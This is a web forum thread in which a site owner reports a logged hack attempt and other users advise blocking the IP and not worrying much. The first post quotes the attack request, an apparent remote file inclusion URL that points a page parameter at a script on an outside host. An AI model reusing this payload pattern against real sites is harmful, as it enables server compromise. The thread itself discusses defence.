possible hack attempt? what should i do?

  • xoog
  • Novice
  • Novice
  • xoog
  • Posts: 20

Post 3+ Months Ago

my user monitoring software has told me that somebody has tried to access:
http://xoog[dot]net/?a=http://blackman.netsons.org/ex.txt?

... it seems they were trying to exploit that '?a=' usually points to which page is accessed, however I'm not stupid enough to leave such a thing so vulnerable (Im not going to detail exactly how 'a' is processed)

I hav disabled the culprit's IP via. .htaccess... but what else should I do?

Should I report the IP to authorities, if so, how?
Can I block the IP from the server altogether (not just via. .htaccess) - and as I only have the one domain on the server, is it worth it?

Thanks
  • joebert
  • Fart Bubbles
  • Genius
  • User avatar
  • Posts: 13504
  • Loc: Florida

Post 3+ Months Ago

I'd just ignore it unless it starts to become a problem.

Looks like somthing automated.
  • xoog
  • Novice
  • Novice
  • xoog
  • Posts: 20

Post 3+ Months Ago

just now it seems that another IP, (possibly the same person?) tried to get into cpanel - im not sure what they would have tried to do (perhaps break my password?), but luckily i dont even use cpanel :)
  • Daemonguy
  • Moderator
  • Web Master
  • User avatar
  • Posts: 2700
  • Loc: Somewhere outside the box in Sarasota, FL.

Post 3+ Months Ago

Frankly, if an attacker does not do due diligence and figure out what the system is running before they try to break it, they're n00bs -- potentially script kiddies.
I would not be altogether concerned.

Remain diligent though. :)
  • webagent
  • Born
  • Born
  • webagent
  • Posts: 4

Post 3+ Months Ago

If you see this think repeating, you may block the ip from iptables too..
  • xoog
  • Novice
  • Novice
  • xoog
  • Posts: 20

Post 3+ Months Ago

thanks for the help - however it seems that blocking them via. htaccess has helped as I found any problems since

the site is growing fast so I should expect more of this in the future I think *goes to backup files*
  • dyefade
  • Expert
  • Expert
  • User avatar
  • Posts: 712
  • Loc: UK

Post 3+ Months Ago

Woah that's creepy - I went to http://www.xoog.net, and on the front page is a picture of someone I knew at uni, at a club we used to go to. How random.

Post Information

  • Total Posts in this topic: 7 posts
  • Users browsing this forum: No registered users and 2 guests
  • You cannot post new topics in this forum
  • You cannot reply to topics in this forum
  • You cannot edit your posts in this forum
  • You cannot delete your posts in this forum
  • You cannot post attachments in this forum
 
 

© 1998-2014. Ozzu® is a registered trademark of Unmelted, LLC.